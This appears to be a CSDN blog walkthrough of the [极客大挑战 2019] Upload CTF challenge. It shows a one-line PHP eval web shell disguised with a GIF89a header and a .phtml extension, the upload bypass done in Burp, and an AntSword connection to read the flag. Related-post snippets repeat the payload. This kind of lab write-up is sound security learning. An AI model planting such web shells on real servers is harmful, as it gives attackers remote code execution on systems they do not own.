[极客大挑战 2019]Upload wp

最新推荐文章于 2025-04-03 19:01:12 发布
原创 最新推荐文章于 2025-04-03 19:01:12 发布 · 202 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#shell

博客记录了利用shell获取文件上传漏洞flag的过程。先尝试上传文件未成功,接着抓包、修改标记处放包,猜测路径后用蚁剑链接shell,最终在根目录下找到并打开flag文件获得flag。

[[极客大挑战 2019]Upload wp


打开页面是这样的
在这里插入图片描述
创建一个test.phtml文件,里面内容为一句话

GIF89a
<script language="php">eval($_POST['shell']);</script>

在这里插入图片描述
我们把这个文件上传上去试一下
在这里插入图片描述
结果不行,我们抓个包看看
在这里插入图片描述
修改一下上面标记的地方,放包
在这里插入图片描述
猜测路径为

url/upload/test.phtml

用蚁剑链接,shell就是一句话里面的shell
在这里插入图片描述
在根目录下找到flag文件,打开
在这里插入图片描述
获得flag,考察文件上传漏洞

[极客挑战 2019]Upload
qq_42404383的博客
10-06 816
[极客挑战 2019]Upload 题目: 文件上传题 分析: 前端 ==> F12查看代码 ==> 无检测机制 后端 ==> 有检测机制 ==> 搞清检测机制 正常的图片无法上传 尝试文本txt ==> 无法上传 打开神器BP,构造上传 修改文件头标志位 ==> 上传成功 可上传 ==> phtml写码 ==> 构造解析 连接后门,找到flag! 解题: flag{801b11a5-bd10-416e-8
极客挑战2019-upload
m0_73303597的博客
12-11 471
自用
BUUCTF [极客挑战 2019] Upload
Senimo
12-17 2942
BUUCTF [极客挑战 2019] Upload 考点: 1. 启动环境: 有上传头像的地方,首先上传正常图片测试: 上传了一张.jpg格式的文件,也显示不是图片 后续测试.php、.txt都不行,可能不止限制了文件后缀,使用BurpSuite抓取数据包: ...
[极客挑战 2019]Upload全网最详细WP
最新发布
siyue_secret的博客
04-03 660
但是从页面信息可知,网站不仅会检查文件类型,网站会检查文件内容。,因为网站后台可能在解析时可能会将其作为图片解析,不能达到我们的目的。我们先尝试构造一段“带漏洞”的php代码,命名为。,直接查看根目录下的文件(flag一般放在网站根目录中)(3)接下来,我们需要利用上传的这个“带漏洞”的文件来。文件夹,居然访问成功了,也可以在里面看到我们刚才上传的。所以我们在文件开头加上用于绕过此检测的GIF文件头。说明网站有一定的过滤机制,尝试将文件名改为。果然找到了flag,然后请求改为。的内容,并将其作为命令执行。
[极客挑战 2019]Upload 1 WP
ALL
03-05 327
[极客挑战 2019]Upload 1 WP 知识点 文件上传漏洞 什么是文件上传漏洞,顾名思义,这个漏洞的产生是发生在文件上传的过程当中的,其实本质上它有些类似于存储型XSS漏洞,从结果上看都是通过漏洞向服务器数据库存储了一段恶意代码,而不同的是文件上传漏洞的利用是以“文件”为载体的。文件我们都知道有很多种类型,如:图片(.jpg,.png,.gif),文本(.txt),网页(.html)等,而文件有两个非常重要的属性:一是文件类型,二是文件名及后缀。文件上传漏洞就是在一些允许进行文件上传的网页(如百度
BUUCTF之Upload [极客挑战 2019]
金 帛的博客
04-19 1479
BUUCTF的WP
[极客挑战 2019]Upload_3.19BUUCTF练习day3(2)
2401_88009915的博客
03-20 879
一道文件上传漏洞关于phtml后缀名和前端content-type
[极客挑战 2019]Upload 1
qq_51439282的博客
03-10 857
[极客挑战 2019]Upload1 这是一道文件上传类型的题目 打开界面可以看到 我们直接上传php一句话木马试试 <?php eval($_POST['shell']);?> eval()函数表示括号内的语句字符串什么的全都当做代码执行。 $_POST[‘muma’]表示从页面中获得muma这个参数值。 把这一块代码放入写在一个php文件中上传 上传后发现他说不是图片 那我们就将文件名后缀php改成jpg绕过这个前段js的检测试试 再次上传试试 他检测到了php的尖括号与问号 看来我们
web-[极客挑战 2019]Upload
wojiushilsy的博客
05-16 466
题目要点题目内容解题 题目要点 Content-Type绕过 文件头绕过 后缀名绕过 题目内容 解题 蚁剑连接
[极客挑战 2019]upload
04-02
### 如何参与极客挑战2019以及完成文件或作品的上传 #### 参与方式 华为云计划在未来两天举办一系列活动,其中包括丰富的专题论坛、圆桌论坛,还有Codelabs、极客挑战赛等活动[^1]。这些活动旨在让开发者能够与...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值